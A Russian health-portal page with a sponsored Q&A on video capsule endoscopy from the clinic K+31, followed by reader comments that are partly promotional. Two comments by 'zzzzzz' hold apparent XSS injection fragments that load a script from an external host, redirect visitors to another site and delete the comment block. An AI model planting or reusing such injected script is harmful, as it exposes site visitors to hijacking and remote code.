Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Видеокапсульная эндоскопи...  >>  Видеокапсульная эндоскопия: ответы специалиста
 
Обратная связь
 

Видеокапсульная эндоскопия: ответы специалиста

Размер шрифта
19 сентября 2012 16:41
  • google_analytics: false
  • Нравится

Об особенностях метода видеокапсульной эндоскопии рассказывает ведущий специалист по эндоскопии Медицинского центра КЛИНИКА+31 , кандидат медицинских наук Иванова Екатерина Викторовна. Также она ответит на частые вопросы пациентов перед этим исследованием.

клиника+31

Что такое видеокапсульная эндоскопия?

Видеокапсульная эндоскопия (капсульная энтероскопия, капсульная интестиноскопия)  – это исследование желудочно-кишечного тракта с помощью автономного капсульного эндоскопа, диаметром 11 мм и длиной 26 мм.

Благодаря наличию разных типов капсульных систем, с их помощью можно прицельно осмотреть пищевод, желудок, тонкую и толстую кишку. Сейчас наиболее востребованным капсульным исследованием является видеокапсульное исследование тонкой кишки, самого длинного органа желудочно-кишечного тракта и труднодоступного для осмотра стандартными эндоскопами.

Видеокапсульное исследование тонкой кишки выполняется с помощью тонкокишечной капсулы, которая самостоятельно «проделывает» путь от ротовой полости до толстой кишки, делая 2 снимка в секунду. «Захваченная» капсулой информация, накапливается на принимающем устройстве в виде видеоотчета длительностью 9-10 часов, или, ориентировочно, 55-60 тысяч снимков. 

У человека капсульную эндоскопию начали применять с 2001 г. В настоящее время в нашей стране зарегистрировано четыре системы для видеокапсульной эндоскопии: PillCam (Given Imaging, Израиль), EndoCapsule (Олимпас, Япония), MiroCam (Южная Корея), OMOM (Китай).

Это практически неинвазивный метод, который не требует применения седативных препаратов. Исследование можно проводить как в амбулаторных, так и в стационарных условиях.

Можно ли с помощью капсулы для тонкой кишки осмотреть желудок и толстую кишку?

Безусловно, при анализе видеозаписи, сделанной капсульным эндоскопом, врач-эндоскопист просматривает все полученные снимки, и, порой, обнаруживает те или иные изменения слизистой оболочки желудка или толстой кишки, которые изредка может «пропустить» даже стандартное эндоскопическое исследование. Однако, как правило, слизистую оболочку желудка удается осмотреть только частично. Такой осмотр не считается высокоинформативным и точным.

Для полноценного исследования верхних отделов пищеварительного тракта лучше проводить стандартную гастродуоденоскопию.

Что касается возможности осмотра толстой кишки с помощью стандартной тонкокишечной капсулы, то этому препятствует несколько важных аспектов, т.к.  необходимо обеспечить идеальную подготовку толстой кишки и дополнительно стимулировать желудочно-кишечный тракт для продвижения капсулы. Для адекватного исследования толстой кишки рекомендуется выполнять стандартную видеоколоноскопию.

В большинстве случаев, перед проведением капсульной эндоскопии тонкой кишки, предварительно выполненные гастро- и колоноскопия обязательны.

Надо ли перед капсульной эндоскопией выполнять рентгенографию тонкой кишки с контрастированием или другие лучевые  исследования?

При отсутствии клинических симптомов непроходимости, либо признаков нарушения пассажа по тонкой кишке (схваткообразные боли, вздутие живота, тошнота, рвота) мы, как правило, не включаем в план обследования и не настаиваем на обязательном проведении инструментальных исследований, призванных предупредить исследующего о возможной задержке видеокапсулы. У пациентов с отсутствием грубых изменений просвета и стенки тонкой кишки, рентгенография с контрастированием и другие лучевые методы обычно не выявляют какой-либо патологии, а, соответственно, не позволяют надежно прогнозировать возможную задержку видеокапсулы. Как правило, необходимости в подобном предварительном обследовании тонкой кишки нет и, когда речь идет о тонкокишечном кровотечении. Если капсула задерживается, и это происходит в зоне кровотечения (например, в области опухоли), пациент в любом случае нуждается в инвазивном эндоскопическом/оперативном вмешательстве.

Необходимость предварительного лучевого обследования перед капсульной эндоскопией определяется индивидуально, исходя из клинической ситуации. Например, при подозрении на болезнь Крона, или наличии признаков нарушения пассажа по тонкой кишке, т.е.  в случае высокой вероятности наличия стеноза тонкой кишки, представляется разумным предварительно выполнить пациенту рентгенографию тонкой кишки с контрастированием, мультиспиральную компьютерную томографию с ангиоусилением, либо МРТ-энтерографию.

Является ли капсула одноразовой?

Да, капсула – разовая и повторно не заряжается.

Надо ли отслеживать выход капсулы?

Пациенты склонны считать, что капсула сама по себе генерирует и хранит изображения, и поэтому испытывают беспокойство, думая, что после выхода из организма, она необходима для просмотра данных. Это совершенно не так. Вся запись передаваемых данных проводится на специальное записывающее устройство.

Отслеживать выход капсулы в большинстве случаев незачем.

Можно ли пользоваться мобильным телефоном в ходе исследования?

Можно, т.к. использование мобильного телефона не влияет на работу видеокапсулы.

Можно ли принимать пищу и пить в день, когда проводится капсульная эндоскопия?

После «запуска» капсулы мы даем рекомендации по режиму и питанию пациента в ходе исследования. Как правило, пить рекомендуем не ранее, чем через 3 часа от начала исследования с последующим возможным приемом чая и бутерброда. Ужин рекомендуем не ранее, чем через 8 часов от начала исследования.

Возможна ли задержка капсулы в организме и что делать, если это произошло?

Пациенты всегда волнуются, когда слышат о возможном риске задержки капсулы. Мы всегда стараемся объяснить, что риск задержки капсулы невелик (это происходит, примерно, в 1% исследований), и в каждом конкретном случае в большей степени зависит от клинической ситуации. В «здоровой» тонкой кишке продвижение капсулы может замедлиться, но она никогда не останавливается в ней надолго. Задержавшаяся в кишке капсула помогает выявить проблему и  локализацию патологически измененного участка. Кроме того, в настоящее время есть возможность извлечь капсулу, не прибегая к операции,  с использованием баллонно-ассистированной энтероскопии. Естественно, что патологический процесс, вызвавший задержку капсулы, сам по себе может потребовать оперативного лечения.

Способны ли методы глубокой баллонно-ассистированной энтероскопии заменить капсульное исследование?

Метод капсульной эндоскопии и глубокая баллонно-ассистированная энтероскопия дополняют, но не заменяют друг друга. Капсульная эндоскопия позволяет врачу ответить на три главных вопроса:

  • имеются ли у пациента изменения тонкой кишки и чем (предположительно) они вызваны?
  • в каком отделе тонкой кишки ориентировочно локализуется заболевание?
  • через какой доступ лучше начинать проведение глубокой баллонно-ассистированной энтероскопии и какие дополнительные воздействия необходимо выполнить (взять биопсию, либо применить лечебное вмешательство).

Необходима ли подготовка тонкой кишки перед капсульной эндоскопией?

Безусловно, подготовка необходима и успех процедуры, во многом, определяется правильной подготовкой. Существует несколько способов подготовки к исследованию, что зачастую определяется индивидуально. В большинстве случаев, требуется:

  • соблюдение бесшлаковой диеты;
  • прием слабительных препаратов для очистки кишки;
  • прием пеногасителя.

Подробную схему подготовки пациент получает при обращении к врачу перед исследованием.

Чтобы пройти обследование, можно обратиться по адресу:

Медицинский центр КЛИНИКА+31
ул. Лобачевского, дом 42, строение 4
Телефон: 8 (800) 777-31-31
www.k31.ru

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

24 декабря 2013 в 14:45

Цитировать   |   Пожаловаться

Долго искал, где пройти эту процедуру - еле еле нашел в своем регионе. Помог вот этот сайт:

может кому тоже будет полезно.

2 - zzzzzz

30 июня 2015 в 21:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - ValensSy

09 марта 2016 в 11:10

Цитировать   |   Пожаловаться

Хочется спросить у тех, кто проходил данную процедуру - каково это? Сильно уж неприятно по ощущениям? И где Вы делали, если проживаете в Москве. А то тоже направление выписали. Что-то боязно идти на эту процедуру.

ValensSy 09 марта 2016 в 11:10
Хочется спросить у тех, кто проходил данную процедуру - каково это? Сильно уж неприятно по ощущениям? И где Вы делали, если проживаете в Москве.
 Процедура совсем простая и гораздо лучше и легче переносится, чем глотание лампочки. Никаких неприятных ощущений типа позывов с тошнотой, глотку не дерет и тому подобное. Делала в клинике К+31, там врач все подробно объяснила, показала, рассказала. Так что и процедура, и врач, и результаты обследования меня порадовали.

6 - mischely

22 апреля 2016 в 18:06

Цитировать   |   Пожаловаться

Кармелита 10 марта 2016 в 13:06
 Процедура совсем простая и гораздо лучше и легче переносится, чем глотание лампочки. Никаких неприятных ощущений типа позывов с тошнотой, глотку не дерет и тому подобное.
 А как долго все происходило? Можно поподробнее и результаты как отдают? На бумажке? 

7 - zabava23

24 апреля 2016 в 14:05

Цитировать   |   Пожаловаться

mischely 22 апреля 2016 в 18:06
 А как долго все происходило? Можно поподробнее и результаты как отдают? На бумажке? 
  Хорошая клиника, там эндоскописты очень хорошие работают. Сначала я приходила на консультацию к врачу, была у Ивановой, потом в назначенный день с утра на процедуру. Перед этим подготовка- вам расскажут на приеме. Стандартно. Утром глотаете капсулу, я прибор приносила на следующий день. Капсулы там хорошие- израильские, они поностью запишут ваш желудок. Результаты в цифровом виде и описание врача. Мне в К+31 понравилось, не раз там была на обследованиях. 

8 - Гость

12 мая 2016 в 14:17

Цитировать   |   Пожаловаться

Глотание лампочки, уже проходила(( ужас( Сейчас только на эндоскопию  надеюсь. 

9 - Гость

12 мая 2016 в 16:16

Цитировать   |   Пожаловаться

     Капсульная эндоскопия, действительно процедура хорошая, если  ее конечно делать в нормальной клинике. Я помню в свое время, про столько клиник и врачей узнавала, очень боялась как бы к плохому специалисты не попасть. И вот по всем показателям именно К31 устроила. Клиника на самом деле замечательная. Работают там профессионалы с большой буквы. Так что советую именно там эндоскопию и делать.  

10 - Guru

19 мая 2016 в 21:35

Цитировать   |   Пожаловаться

Большое спасибо специалистам! Ходила на диагностику в эту клинику  и, в том числе, проходила капсульную эндоскопию. Процедура прошла успешно и совершенно безболезненно. Я очень сильно волновалась, но прошло все просто отлично. Проглотила капсулу, встроенная в нее камера отсняла всю нужную информацию и мне поставили правильный диагноз и выписали необходимое лечение. Клиникой к+31 осталась довольна. Рекомендую.

Статьи

       
Язва желудка защищает от инфаркта и рака   Как избавиться от изжоги   Синдром раздраженного кишечника   Что делает гастроэнтеролог, если у него запор  
28 июля 2011Шунтирование желудка меняет вкусовые пристрастия 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
17 декабря 2012Новый метод позволит ловить раковые клетки 25 июня 2012Ожирение вызывают микробы, живущие в кишечнике!
 

Слайдшоу

1
Все, что нужно знать о желудке
Как обмануть желудок и похудеть?
Что ваш стул говорит о вас

Тесты

Знаете ли вы, как работает ваш желудок?
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.